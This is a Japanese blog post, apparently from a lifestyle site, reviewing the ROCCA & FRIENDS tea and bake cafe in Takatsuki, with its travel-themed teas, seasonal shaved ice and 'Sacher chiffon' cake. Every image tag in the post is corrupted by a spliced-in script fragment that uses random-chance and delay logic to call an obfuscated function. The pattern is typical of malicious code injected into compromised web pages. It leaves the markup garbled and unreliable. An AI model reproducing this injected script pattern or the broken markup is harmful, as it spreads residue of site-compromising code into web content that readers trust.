こんにちは、ムラタユイです。

今回は大阪駅と京都駅のちょうど真ん中に位置する街、高槻へ。2015年にオープンして以来今人気急上昇の、旅する紅茶とベイクショップ&カフェ「ROCCA & FRIENDS」へ行ってきました。場所は、JR高槻駅から徒歩数分のところにあるビルの2階にあります。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_02.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_02″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9244″ />

オーナーの寺本恵里さんは、デザイナー。職業柄海外へ行かれることが多く、旅が好き、そして食べることが大好き。そんな好きが高じて、さまざまな国へ自ら赴き、世界のおいしいものをご自身の舌で確かめてきたそうです。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_03.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_03″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9245″ />
これまで寺本さんが手がけたデザイン本

最初に手がけた「6+E united cafe」(同ビル3階)は、寺本さんの経験のもと、「旅先で食べる感動ごはん」をコンセプトに世界各国の料理を提供しています。

そんな寺本さんが手がけた2店舗目のお店が「ROCCA & FRIENDS」。内装デザインは、もちろん寺本さんのプロデュース。ニューヨークのホテルのカフェのような雰囲気をイメージされているそうです。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_04.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_04″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9246″ />

彩り鮮やかなベジデリやアメリカの郷土料理のひとつポップオーバーなどランチも人気メニューのひとつですが、メインとなるのは、旅する紅茶とバラエティ豊かなケーキ焼き菓子です。

店内に入ると、まずは陳列台にきれいに並んださまざまな焼き菓子が出迎えてくれます。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_05.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_05″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9247″ />

カラフルなジュエルマフィンに、おかず系マフィンのデリケーク。ビスケットとスコーンを掛け合わせたビスコーンや、ジューシーな季節の果実を使ったケーキなど、所狭しと並んでいます。

陳列台の反対側にあるブラックボードには、さまざまな都市の名前が書かれています。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_06.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_06″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9248″ />

これらは、寺本さんが今までに訪れた世界の都市をイメージしブレンドされた紅茶のラインナップです。それぞれの缶のデザインは、とびきりかわいいものばかり。ひとくち飲むだけで、その国へ訪れた気分にさせてくれるような香りが広がります。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_07.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_07″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9249″ />

瀬戸内レモンとアールグレイミルクティーの限定かき氷

今回いただいたのは、季節限定のかき氷(シェーブドティーアイス)の「瀬戸内レモンとアールグレイミルクティー」。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_08.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_08″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9250″ />

このフォトジェニックな見た目に、運ばれてきた瞬間から大興奮だったのですが、食べすすめるごとに新たなサプライズが次々と現れる玉手箱のような一品。天然氷を使用したふわっふわの氷は、口に運ぶと同時に、香りの良いアールグレイのフレーバーを残しながら、さらさらっとほどけていきます。

表面には香ばしい甘さのキャラメルクリームと、瀬戸内レモンのコンポートがトッピングされ、自分なりに配合やバランスを微調整しながら味わえます。さらに食べすすめていくと、中からレモンカードが現れ、最後にはミルクティーパンナコッタにまで出会えるというフルコース!

そして、最後の最後には溶けて程よく混ざり合った氷やシロップを、アイスティーとしてティーカップでぐいっと飲みほせるようになっています。さすが紅茶専門店だなぁ…と感じさせられる粋な演出です。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_09.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_09″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9251″ />

シェーブドティーアイスは、夏季限定で9月末頃まで食べられるそう。時間は14時〜となっているので、こちらを目指して訪れる際はお気をつけくださいね◎

かき氷に限らず、こちらのお店屋さんはとても人気なので、イートインをご希望の場合は、事前に席を予約しておくことがオススメです(混雑時は90分時間制ですが、確実に座れます)。

ザッハトルテ×シフォン=「ザッハシフォン」

数あるラインナップの中から、オーナーの寺本さんオススメは、「ザッハシフォン」(ショーケース内、手前のチョコのケーキです)。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_10.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_10″ width=”1860″ height=”1860″ class=”alignnone size-full wp-image-9252″ />

アイデアのきっかけは、寺本さんがオーストリア・ウィーンを訪れたときのこと。

街のほとんどのお菓子屋さんで見かけるほど愛され、200年の歴史を今もなお紡ぐ国民的おやつの「ザッハトルテ」に感銘を受けたことから生まれたメニューだそうです。

少し硬さのある本場のザッハトルテより、やわらかくて食べやすいふわふわ感を出すために、シフォンケーキをベースに、より日本人の女の子が好きな食感にアレンジされています。ゆえに、名前は「ザッハシフォン」。

中には少しリキュールの効いた杏のジャムが潜んで、コーティングのチョコレートとの相性もばっちり。本場の味も再現しながら、ここ高槻でしか買えない、高槻のおみやげとしてぜひ手にとってほしいオススメのケーキです。

実は以前訪れたことがあるのですが、そのときには、カラフルな野菜で彩られたボリューム満点のプレート「ベジデリ」をいただきました。

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_11.jpg” alt=”roccaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andfriends_11″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-10036″ />

さらにスープとベイクが2つもついてお得感があります。こちらはロンドンで食べたベジビュッフェからインスピーレーションを受け、生まれたメニューだそう。

旅する紅茶はCOPENHAGENを。爽やかなすっきりとした味わいで、ランチにもよく合うとのことでこちらをチョイス。ジョッキ並みのサイズにびっくりしましたが、ぐびぐびと飲めちゃう美味しさでした。

紅茶も種類が豊富なので迷ったときには、食べたいものに合う紅茶を店員さんに聞いてみるのもいいかもしれません。もしくは行ってみたい国、行ったことのある国などその日の気分で選ぶのもオススメです。

お持ち帰りで楽しむ「ROCCA & FRIENDS」のお話は、明日7月12日(火)にアップ予定です。どうぞお楽しみに!